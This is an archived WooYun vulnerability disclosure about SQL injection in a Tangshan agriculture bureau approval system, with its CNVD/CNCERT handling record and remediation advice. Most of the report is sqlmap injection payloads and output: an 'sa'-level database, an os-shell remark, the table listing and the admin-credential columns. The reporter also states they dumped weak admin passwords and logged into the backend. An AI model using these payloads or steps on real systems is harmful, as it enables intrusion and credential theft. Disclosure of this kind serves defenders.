乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 细节已通知厂商并且等待厂商处理中 2015-09-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-27: 细节向核心白帽子及相关领域专家公开 2015-10-07: 细节向普通白帽子公开 2015-10-17: 细节向实习白帽子公开 2015-11-01: 细节向公众公开
公司:我的备案通不过怎么办? 黑帽:2000块钱,包过。
唐山市农牧局农业投入品准入系统
http://**.**.**.**/ApplicationSearch.aspx?type=1
数据库用户是SA权限,又可以--os-shell了呢~
---Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=1 AND 5994=5994 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: type=1 AND 5104=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5104=5104) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: type=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4677=4677) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: type=1 OR 3921=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008current user: 'sa'sqlmap resumed the following injection point(s) from stored session:---
数据表:
---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: TSAA_Application1[60 tables]+-------------------------------+| Application || ApplicationStatus || Area || BusinessField || Company || CompanyBusinessField || CompanyStatus || CompanyType || Education || Log || MarketPermission || ProcessDocument || Producer || Product || ProductStatus || ProductionDocument || QualityAssurance || QualityTest || cms_advs_advscontent || cms_advs_advscustomers || cms_advs_advshits || cms_content_1 || cms_content_2 || cms_content_3 || cms_content_4 || cms_content_5 || cms_content_6 || cms_content_Content || cms_content_ContentUpFile || cms_log_ContentClickLog || cms_model_FormInputLimitType || cms_model_FormInputType || cms_model_FormInputValue || cms_model_FormInputValueType || cms_model_Model || cms_model_ModelField || cms_node_ContentPubType || cms_node_Node || cms_node_NodeAddionalPub || cms_node_NodeContentSort || cms_node_NodeGroup || cms_node_NodeType || cms_oper_log || cms_pub_pubTask || cms_rec_Recom || cms_rec_RecomContent || cms_rec_RecomTemplate || cms_sys_ContentWorkFlow || cms_sys_Log || cms_sys_PSN || cms_sys_ParamType || cms_sys_TimeZone || cms_sys_WordReplace || cms_user_AdminUsers || cms_user_UserBase || cms_user_UserPermission || cms_vwAllBaseInfo || cms_vwCommendAllInfo || cms_vwContentBaseInfoForClick || cms_vwContentClickLog |+-------------------------------+sqlmap resumed the following injection point(s) from stored session:---
管理表:
Table: cms_user_AdminUsers[10 columns]+---------------+----------+| Column | Type |+---------------+----------+| AddTime | datetime || LastLogTime | datetime || LogName | nvarchar || LogPWD | varchar || Name | nvarchar || NodeIds | nvarchar || PermissionIds | varchar || PubCount | int || Sex | bit || UserBaseId | int |+---------------+----------+
dump出来的数据
全是弱口令……用管理员帐号进后台证明一下
过滤+不要使用弱口令+隐藏后台+数据库权限最小化
危害等级:高
漏洞Rank:11
确认时间:2015-09-17 15:55
CNVD确认并复现所述情况,已经转由CNCERT下发给河北分中心,由其后续协调网站管理单位处置。
暂无
